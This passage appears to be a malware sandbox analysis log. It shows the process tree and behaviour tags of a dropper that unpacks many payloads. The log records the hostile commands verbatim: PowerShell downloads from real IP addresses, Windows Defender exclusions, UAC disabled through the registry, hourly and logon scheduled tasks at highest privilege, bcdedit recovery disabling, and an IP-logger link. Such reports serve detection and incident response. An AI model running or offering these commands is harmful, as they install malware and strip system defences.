PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

Processes:

New.exeld.exeBhkHOtQUzYlmmW5DIU7AxqxG.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	New.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	ld.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	BhkHOtQUzYlmmW5DIU7AxqxG.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:228

C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5644

C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
"C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1872

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3712

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:7612

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:10000

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5904

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:3560

C:\Users\Admin\AppData\Local\Temp\spanjOLCiMa0OepN\VBeuHTRSGyPYiKuktJMi.exe
"C:\Users\Admin\AppData\Local\Temp\spanjOLCiMa0OepN\VBeuHTRSGyPYiKuktJMi.exe"
4⤵
PID:5232

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:8152

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
6⤵
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 2148
4⤵
- Program crash
PID:4528

C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
"C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc02a346f8,0x7ffc02a34708,0x7ffc02a34718
5⤵
PID:976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1988 /prefetch:2
5⤵
PID:5040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 /prefetch:3
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
5⤵
PID:4028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
5⤵
PID:3212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
5⤵
PID:4240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
5⤵
PID:5640

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 /prefetch:8
5⤵
PID:1408

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4304 /prefetch:1
5⤵
PID:5372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
5⤵
PID:5436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
5⤵
PID:5792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
5⤵
PID:5504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
5⤵
PID:6912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
5⤵
PID:8876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1
5⤵
PID:8364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4320 /prefetch:2
5⤵
PID:9160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2436 /prefetch:1
5⤵
PID:7668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,12291382554803181607,17892590513468741898,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5636 /prefetch:2
5⤵
PID:6624

C:\Windows\SysWOW64\tar.exe
tar -xf putty.zip
4⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
4⤵
- Executes dropped EXE
PID:5096

C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
"C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1564

C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:1528

C:\Users\Admin\AppData\Local\Temp\a\New.exe
"C:\Users\Admin\AppData\Local\Temp\a\New.exe"
2⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5168

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
3⤵
PID:5252

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3056

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo=
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6024

C:\Program Files (x86)\1717260417_0\360TS_Setup.exe
"C:\Program Files (x86)\1717260417_0\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:5748

C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe
"C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe"
2⤵
- Executes dropped EXE
PID:820

C:\Users\Admin\AppData\Local\Temp\is-I6B65.tmp\GTA_V.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I6B65.tmp\GTA_V.tmp" /SL5="$B020E,18247052,1148416,C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5956

C:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\libs.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4252

C:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\IJUP069TW.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7124

C:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\KKUS33HVT.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-G3A8D.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3056

C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe
"C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5564

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4612

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1744

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6312

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:9856

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:10144

C:\Users\Admin\AppData\Local\Temp\spanjOLCiMa0OepN\VBeuHTRSGyPYiKuktJMi.exe
"C:\Users\Admin\AppData\Local\Temp\spanjOLCiMa0OepN\VBeuHTRSGyPYiKuktJMi.exe"
4⤵
PID:5852

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:2344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:8252

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
6⤵
PID:10120

C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe
"C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5292

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6032

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5416

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5400

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4888

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Windows security modification
- Adds Run key to start application
PID:6444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4900

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST
4⤵
PID:3328

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST
5⤵
- Creates scheduled task(s)
PID:6888

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST
4⤵
PID:6776

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST
5⤵
- Creates scheduled task(s)
PID:6584

C:\Users\Admin\AppData\Local\Temp\a\ld.exe
"C:\Users\Admin\AppData\Local\Temp\a\ld.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:440

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
3⤵
PID:6160

C:\Windows\system32\bcdedit.exe
bcdedit /set {current} bootstatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:6404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
3⤵
PID:6916

C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:6456

C:\Users\Admin\AppData\Local\Temp\a\MSiedge.exe
"C:\Users\Admin\AppData\Local\Temp\a\MSiedge.exe"
2⤵
- Executes dropped EXE
PID:5780

C:\Users\Admin\AppData\Local\Temp\a\victor.exe
"C:\Users\Admin\AppData\Local\Temp\a\victor.exe"
2⤵
- Executes dropped EXE
PID:5948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 232
3⤵
- Program crash
PID:7208

C:\Users\Admin\AppData\Local\Temp\a\RambledMime.exe
"C:\Users\Admin\AppData\Local\Temp\a\RambledMime.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7648

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of SetThreadContext
PID:7336

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
4⤵
PID:7980

C:\Users\Admin\AppData\Local\Temp\a\current.exe
"C:\Users\Admin\AppData\Local\Temp\a\current.exe"
2⤵
- Executes dropped EXE
PID:7680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 1092
3⤵
- Program crash
PID:8180

C:\Users\Admin\AppData\Local\Temp\a\host_so.exe
"C:\Users\Admin\AppData\Local\Temp\a\host_so.exe"
2⤵
- Executes dropped EXE
PID:7672

C:\Users\Admin\AppData\Local\Temp\a\mixinte.exe
"C:\Users\Admin\AppData\Local\Temp\a\mixinte.exe"
2⤵
- Executes dropped EXE
PID:6336

C:\Users\Admin\AppData\Local\Temp\a\inte.exe
"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
2⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:7060

C:\Users\Admin\AppData\Local\Temp\a\winlogon.exe
"C:\Users\Admin\AppData\Local\Temp\a\winlogon.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:7608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " WindowStyle -Hidden Add-MpPreference -ExclusionPath 'C:\' -Force [Net.ServicePointManager]::SecurityProtocol = 'Tls, Tls11, Tls12, Ssl3' $DownloadUrl = 'http://49.13.194.118/ADServices.exe' $WebResponse = Invoke-WebRequest -Uri $DownloadUrl -Method Head Write-Output 'Downloading $DownloadUrl' Start-BitsTransfer -Source $WebResponse.BaseResponse.ResponseUri.AbsoluteUri.Replace('%20', ' ') -Destination 'C:\\Windows\\Temp\\'"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7704

C:\Users\Admin\AppData\Local\Temp\a\setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
2⤵
- Executes dropped EXE
PID:8552

C:\Users\Admin\AppData\Local\Temp\7zSF5F4.tmp\Install.exe
.\Install.exe
3⤵
- Executes dropped EXE
PID:6436

C:\Users\Admin\AppData\Local\Temp\7zSFF1C.tmp\Install.exe
.\Install.exe /yrVdidRYRgn "385118" /S
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:1868

C:\Windows\SysWOW64\cmd.exe
